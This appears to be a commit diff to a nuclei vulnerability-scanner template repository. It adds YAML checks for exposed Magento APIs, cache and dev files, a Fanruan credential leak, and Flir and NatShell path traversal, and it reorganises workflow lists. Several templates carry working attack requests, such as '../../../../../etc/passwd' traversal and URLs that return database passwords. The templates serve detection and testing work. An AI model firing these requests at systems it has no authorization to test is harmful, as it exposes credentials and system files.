description: The API in Magento 2 can be accessed by the world without providing credentials. Through the API information like storefront, (hidden) products including prices are exposed.
reference: https://support.hypernode.com/en/ecommerce/magento-2/how-to-protect-the-magento-2-api
tags: magento
requests:
- method: GET
path:
- '{{BaseURL}}/rest/V1/products'
- '{{BaseURL}}/rest/V1/store/storeConfigs'
- '{{BaseURL}}/rest/V1/store/storeViews'
matchers-condition: or
matchers:
- type: dsl
dsl:
- 'contains(body, "searchCriteria")'
- 'contains(body, "parameters")'
- 'contains(body, "message")'
- 'contains(tolower(all_headers), "application/json")'
condition: and
- type: dsl
dsl:
- 'contains(body, "secure_base_link_url")'
- 'contains(body, "timezone")'
- 'contains(tolower(all_headers), "application/json")'
- 'status_code == 200'
condition: and
- type: dsl
dsl:
- 'contains(body, "name")'
- 'contains(body, "website_id")'
- 'contains(tolower(all_headers), "application/json")'
- 'status_code == 200'
condition: and

35
vulnerabilities/magento/magento-cacheleak.yaml Normal file
View File

@ -0,0 +1,35 @@
id: magento-cacheleak
info:
name: Magento Cacheleak
author: TechbrunchFR
severity: high
description: Magento Cacheleak is an implementation vulnerability, result of bad implementation of web-server configuration for Magento platform. Magento was developed to work under the Apache web-server which natively works with .htaccess files, so all needed configuration directives specific for various internal Magento folders were placed in .htaccess files. When Magento is installed on web servers that are ignoring .htaccess files (such as nginx), an attacker can get access to internal Magento folders (such as the Magento cache directory) and extract sensitive information from cache files.
reference:
- https://support.hypernode.com/en/best-practices/security/how-to-secure-magento-cacheleak
- https://www.acunetix.com/vulnerabilities/web/magento-cacheleak/
- https://royduineveld.nl/magento-cacheleak-exploit/
tags: magento
requests:
- method: GET
path:
- '{{BaseURL}}/var/resource_config.json'
# Based on royduineveld.nl blogpost, was not tested against a vulnerable Magento site
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "media_directory"
- "allowed_resources"
part: body
- type: word
words:
- "application/json"
part: header

35
vulnerabilities/magento/magento-unprotected-dev-files.yaml Normal file
View File

@ -0,0 +1,35 @@
id: magento-unprotected-dev-files
info:
name: Magento Unprotected development files
author: TechbrunchFR
severity: high
description: Magento version 1.9.2.x includes /dev directories or files that might reveal your passwords and other sensitive information. The /dev directories and files are not protected by default. According to Magento, "these tests are not supposed to end up on production servers".
reference: https://support.hypernode.com/en/support/solutions/articles/48001153348-how-to-secure-your-data-using-encryption-and-hashing
tags: magento
requests:
- method: GET
path:
- '{{BaseURL}}/dev/tests/functional/credentials.xml.dist'
- '{{BaseURL}}/dev/tests/functional/etc/config.xml.dist'
matchers:
- type: dsl
dsl:
- 'contains(body, "Magento")'
- 'contains(body, "replace xmlns:xsi=")'
- 'contains(body, "<field path=")'
- 'contains(tolower(all_headers), "application/xml") || contains(tolower(all_headers), "application/octet-stream")'
- 'status_code == 200'
condition: and
- type: dsl
dsl:
- 'contains(body, "Magento")'
- 'contains(body, "config xmlns:xsi")'
- 'contains(body, "<application>")'
- 'contains(body, "<install>")'
- 'contains(tolower(all_headers), "application/xml") || contains(tolower(all_headers), "application/octet-stream")'
- 'status_code == 200'
condition: and

6
vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml
View File

@ -2,9 +2,9 @@ id: oracle-ebs-bispgrapgh-file-read
info:
name: Oracle EBS Bispgraph File Access
author: emenalf & tirtha_mandal
author: emenalf & tirtha_mandal & thomas_from_offensity
severity: critical
tags: moodle,lfi
tags: oracle,lfi
reference: |
- https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
- https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf
@ -20,4 +20,4 @@ requests:
- type: regex
regex:
- "root:[x*]:0:0:"
part: body
part: body

2
vulnerabilities/other/concrete-xss.yaml
View File

@ -27,6 +27,8 @@ requests:
part: header
words:
- "text/html"
- "CONCRETE5"
condition: and
- type: status
status:

36
vulnerabilities/other/fanruanoa2012-disclosure.yaml Normal file
View File

@ -0,0 +1,36 @@
id: fanruanoa2012-disclosure
info:
name: Fanruan Report 2012 Information Disclosure
author: YanYun
discrption: Fanruan Report 2012 has an information disclosure vulnerability, and some sensitive information can be obtained by accessing a specific URL
severity: high
tags: oa,java,fanruan,disclosure
reference: http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E5%B8%86%E8%BD%AFOA/%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8%202012%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html
requests:
- method: GET
path:
- "{{BaseURL}}/ReportServer?op=fr_server&cmd=sc_getconnectioninfo"
- "{{BaseURL}}/WebReport/ReportServer?op=fr_server&cmd=sc_getconnectioninfo"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- '"connection"'
- '"name"'
- '"driver"'
- '"password"'
- '"url"'
- '"user"'
condition: and
- type: word
words:
- "application/json"
part: header

25
vulnerabilities/other/flir-path-traversal.yaml Normal file
View File

@ -0,0 +1,25 @@
id: flir-path-traversal
info:
name: Flir Path Traversal
author: pikpikcu
severity: high
reference: https://juejin.cn/post/6961370156484263972
tags: flir,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/download.php?file=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
condition: and
- type: status
status:
- 200

24
vulnerabilities/other/natshell-path-traversal.yaml Normal file
View File

@ -0,0 +1,24 @@
id: natshell-path-traversal
info:
name: NatShell Path Traversal
author: pikpikcu
severity: high
reference: https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw
tags: natshell,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/download.php?file=../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "toor:[x*]:0:0"
- type: status
status:
- 200

2
workflows/aem-workflow.yaml
View File

@ -7,4 +7,4 @@ info:
tags: workflow
workflows:
- template: misconfiguration/aem/
- template: misconfiguration/aem/

5
workflows/gitlab-workflow.yaml
View File

@ -10,7 +10,4 @@ workflows:
- template: exposed-panels/gitlab-detect.yaml
subtemplates:
- template: misconfiguration/gitlab/gitlab-public-repos.yaml
- template: misconfiguration/gitlab/gitlab-public-signup.yaml
- template: misconfiguration/gitlab/gitlab-public-snippets.yaml
- template: misconfiguration/gitlab/gitlab-user-enumeration.yaml
- template: misconfiguration/gitlab/

9
workflows/jira-workflow.yaml
View File

@ -23,11 +23,4 @@ workflows:
- template: cves/2019/CVE-2019-3403.yaml
- template: cves/2020/CVE-2020-14179.yaml
- template: cves/2020/CVE-2020-14181.yaml
- template: vulnerabilities/jira/jira-service-desk-signup.yaml
- template: vulnerabilities/jira/jira-unauthenticated-dashboards.yaml
- template: vulnerabilities/jira/jira-unauthenticated-popular-filters.yaml
- template: vulnerabilities/jira/jira-unauthenticated-projects.yaml
- template: vulnerabilities/jira/jira-unauthenticated-user-picker.yaml
- template: vulnerabilities/jira/jira-unauthenticated-resolutions.yaml
- template: vulnerabilities/jira/jira-unauthenticated-adminprojects.yaml
- template: vulnerabilities/jira/jira-unauthenticated-projectcategories.yaml
- template: vulnerabilities/jira/

14
workflows/magento-workflow.yaml Normal file
View File

@ -0,0 +1,14 @@
id: magento-workflow
info:
name: Magento Security Checks
author: TechbrunchFR
description: A simple workflow that runs all Magento related nuclei templates on a given target.
tags: workflow
workflows:
- template: technologies/magento-detect.yaml
subtemplates:
- template: exposures/configs/magento-config.yaml
- template: exposed-panels/magento-admin-panel.yaml
- template: vulnerabilities/magento/

4
workflows/samsung-wlan-ap-workflow.yaml
View File

@ -7,6 +7,4 @@ info:
workflows:
- template: default-logins/samsung/samsung-wlan-ap-default-credentials.yaml
- template: vulnerabilities/samsung/samsung-wlan-ap-rce.yaml
- template: vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml
- template: vulnerabilities/samsung/samsung-wlan-ap-xss.yaml
- template: vulnerabilities/samsung/

13
workflows/springboot-workflow.yaml
View File

@ -13,14 +13,7 @@ workflows:
- template: technologies/springboot-actuator.yaml
subtemplates:
- template: misconfiguration/springboot/springboot-configprops.yaml
- template: misconfiguration/springboot/springboot-env.yaml
- template: misconfiguration/springboot/springboot-heapdump.yaml
- template: misconfiguration/springboot/springboot-httptrace.yaml
- template: misconfiguration/springboot/springboot-loggers.yaml
- template: misconfiguration/springboot/springboot-mappings.yaml
- template: misconfiguration/springboot/springboot-trace.yaml
- template: vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml
- template: vulnerabilities/springboot/springboot-h2-db-rce.yaml
- template: misconfiguration/springboot/
- template: vulnerabilities/springboot/
- template: cves/2018/CVE-2018-1271.yaml
- template: cves/2020/CVE-2020-5410.yaml
- template: cves/2020/CVE-2020-5410.yaml

3
workflows/thinkcmf-workflow.yaml
View File

@ -9,5 +9,4 @@ workflows:
- template: technologies/thinkcmf-detection.yaml
subtemplates:
- template: vulnerabilities/thinkcmf/thinkcmf-lfi.yaml
- template: vulnerabilities/thinkcmf/thinkcmf-rce.yaml
- template: vulnerabilities/thinkcmf/

5
workflows/thinkphp-workflow.yaml
View File

@ -11,7 +11,4 @@ workflows:
matchers:
- name: thinkphp
subtemplates:
- template: vulnerabilities/thinkphp/thinkphp-2-rce.yaml
- template: vulnerabilities/thinkphp/thinkphp-5022-rce.yaml
- template: vulnerabilities/thinkphp/thinkphp-5023-rce.yaml
- template: vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml
- template: vulnerabilities/thinkphp/

28
workflows/wordpress-workflow.yaml
View File

@ -31,29 +31,5 @@ workflows:
- template: cves/2020/CVE-2020-35951.yaml
- template: cves/2020/CVE-2020-35489.yaml
- template: cves/2021/CVE-2021-24146.yaml
- template: vulnerabilities/wordpress/wordpress-auth-bypass-wptimecapsule.yaml
- template: vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml
- template: vulnerabilities/wordpress/wordpress-total-upkeep-backup-download.yaml
- template: vulnerabilities/wordpress/easy-wp-smtp-listing.yaml
- template: vulnerabilities/wordpress/sassy-social-share.yaml
- template: vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml
- template: vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml
- template: vulnerabilities/wordpress/wordpress-db-backup.yaml
- template: vulnerabilities/wordpress/wordpress-debug-log.yaml
- template: vulnerabilities/wordpress/wordpress-directory-listing.yaml
- template: vulnerabilities/wordpress/wordpress-emails-verification-for-woocommerce.yaml
- template: vulnerabilities/wordpress/wordpress-emergency-script.yaml
- template: vulnerabilities/wordpress/wordpress-installer-log.yaml
- template: vulnerabilities/wordpress/wordpress-social-metrics-tracker.yaml
- template: vulnerabilities/wordpress/wordpress-tmm-db-migrate.yaml
- template: vulnerabilities/wordpress/wordpress-user-enumeration.yaml
- template: vulnerabilities/wordpress/wordpress-wordfence-xss.yaml
- template: vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml
- template: vulnerabilities/wordpress/wordpress-xmlrpc-listmethods.yaml
- template: vulnerabilities/wordpress/wp-xmlrpc.yaml
- template: vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml
- template: vulnerabilities/wordpress/wp-enabled-registration.yaml
- template: vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml
- template: vulnerabilities/wordpress/wp-uploads-listing.yaml
- template: vulnerabilities/wordpress/wp-license-file.yaml
- template: vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml
- template: cves/2021/CVE-2021-24176.yaml
- template: vulnerabilities/wordpress/